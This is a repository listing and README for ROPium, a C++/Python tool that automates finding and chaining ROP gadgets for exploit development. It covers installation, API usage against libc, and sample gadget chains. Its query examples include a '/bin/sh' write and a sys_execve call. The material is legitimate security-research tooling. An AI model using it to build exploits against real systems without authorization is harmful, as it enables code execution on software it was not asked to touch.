https://github.com/boyan-milanov/ropium

ROPium is a tool that helps you building ROP exploits by finding and chaining gadgets together
https://github.com/boyan-milanov/ropium

binary-exploitation chaining-gadgets exploit-development gadget rop-chain rop-exploits rop-gadgets security security-vulnerability semantic

Last synced: 3 months ago
JSON representation

ROPium is a tool that helps you building ROP exploits by finding and chaining gadgets together

• Host: GitHub
• URL: https://github.com/boyan-milanov/ropium
• Owner: Boyan-MILANOV
• Created: 2018-02-10T17:55:25.000Z (over 7 years ago)
• Default Branch: master
• Last Pushed: 2023-01-15T16:25:04.000Z (over 2 years ago)
• Last Synced: 2025-03-29T21:09:17.918Z (3 months ago)
• Topics: binary-exploitation, chaining-gadgets, exploit-development, gadget, rop-chain, rop-exploits, rop-gadgets, security, security-vulnerability, semantic
• Language: C++
• Homepage:
• Size: 11.5 MB
• Stars: 384
• Watchers: 12
• Forks: 42
• Open Issues: 7
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        











# About

**ROPium** (ex-ROPGenerator) is a library/tool that makes ROP-exploits easy. It automatically extracts and analyses gadgets from binaries and

lets you find ROP-chains with semantic queries. ROPium supports *X86* and *X64* architectures, soon to be 

extended with *ARM*.

Key features:

   - **Effortless**: ROPium works out-of-the-box with a smooth Command Line Interface

   - **Python API**: It is easy to integrate ROPium in script thanks to its python API

   - **Automatic chaining**: ROPium automatically combines gadgets to create complex ROP-chains

   - **Advanced features**: ROPium supports function calls for various ABIs, syscalls, ...

   - **Semantic queries**: ROPium queries are quick and convenient to write : ``rax=rbx+8``, ``[rdi+0x20]=rax``, ``rsi=[rbx+16]``, ``0x08040212(1, 2, rax)``, ``[0xdeadbeaf] = "/bin/sh\x00"``, ``sys_execve(0xdeadbeef, 0, 0)``, ``sys_0x1(0)``, ``...``

# Content

- [About](#about)

- [Installation](#installation)

- [Getting started](#getting-started)

   - [CLI tool](#cli-tool)

   - [Python API](#python-api)

- [Docker](#docker)

- [Contact](#contact)

- [Licence](#licence)

- [Special thanks](#special-thanks)

# Installation

First install the [Capstone](https://github.com/aquynh/capstone) disassembly framework: 

      sudo apt-get install libcapstone-dev

You also need the latest [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) release: 

      git clone https://github.com/JonathanSalwan/ROPgadget && cd ROPgadget

      python setup.py install --user 

To use the CLI tool, install [prompt_toolkit](https://github.com/prompt-toolkit/python-prompt-toolkit):

      

      pip3 install prompt_toolkit

Finally install **ROPium**:

      git clone https://github.com/Boyan-MILANOV/ropium && cd ropium

      make

      make test

      sudo make install 

# Getting started

### CLI tool

Thanks to a Command-Line-Interface wrapper, you can use ROPium interactively to quickly build ropchains:  



  



### Python API

Do you need to integrate ropchains directly in your scripts ? Good news, ROPium has a python API !

Loading a binary and finding ropchains:

```Python

from ropium import *

rop = ROPium(ARCH.X64)

rop.load('/lib/x86_64-linux-gnu/libc-2.27.so')

chain = rop.compile('rbx = [rax + 0x20]')

```

Dumping a ropchain in various formats:

```Python

>>> print( chain.dump() )

0x000000000009a851 (sub rax, 0x10; ret)

0x0000000000130018 (mov rax, qword ptr [rax + 0x30]; ret)

0x0000000000052240 (push rax; pop rbx; ret)

>>> print(chain.dump('python'))

from struct import pack

off = 0x0

p = ''

p += pack('>> print(chain.dump('raw'))

b'Q\xa8\t\x00\x00\x00\x00\x00\x18\x00\x13\x00\x00\x00\x00\x00@"\x05\x00\x00\x00\x00\x00'

```

Set constraints on ropchains:

```Python

# Bytes that should not appear in the ropchain

rop.bad_bytes = [0x00, 0x0a, 0x0b]

# Register that should not be clobbered by the ropchain

rop.keep_regs = ['rsi', 'rdx']

# Enable/Forbid ropchain to dereference registers that might hold invalid addresses

# Safe mode is 'True' by default

rop.safe_mem = False

# Specify which ABI you want to use when calling functions

rop.abi = ABI.X86_CDECL

# Specify which system to target when doing syscalls

rop.os = OS.LINUX

```

# Docker

If needed you can run ROPium in a docker container. The container can be generated from the *Dockerfile* as

follows:

```bash

# Create your docker image (this will take time!)

docker build . --tag ropium

# Run the image in interactive mode, bind mounting the file to analyze

docker run --rm -it -v /FULL/HOST/PATH/FILE:/tmp/FILE:ro ropium

(ropium)> load -a X86 /tmp/FILE

```

The actual image is around 200 MB based on a Debian Stretch with a Python 3.7.3 installed. 

# Contact

**Boyan MILANOV** - boyan.milanov (at) hotmail (dot) fr

# Licence

ROPium is provided under the MIT licence.

# Special thanks

Contributors:

   -  Docker container support: [migounette](https://github.com/migounette), [clslgrnc](https://github.com/clslgrnc)

ROPium uses the following awesome projects: 

   - [capstone](https://github.com/aquynh/capstone) : Disassembly Framework

   - [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) : Gadget extractor

   - [prompt-toolkit](https://github.com/prompt-toolkit/python-prompt-toolkit) : Python CLI interface library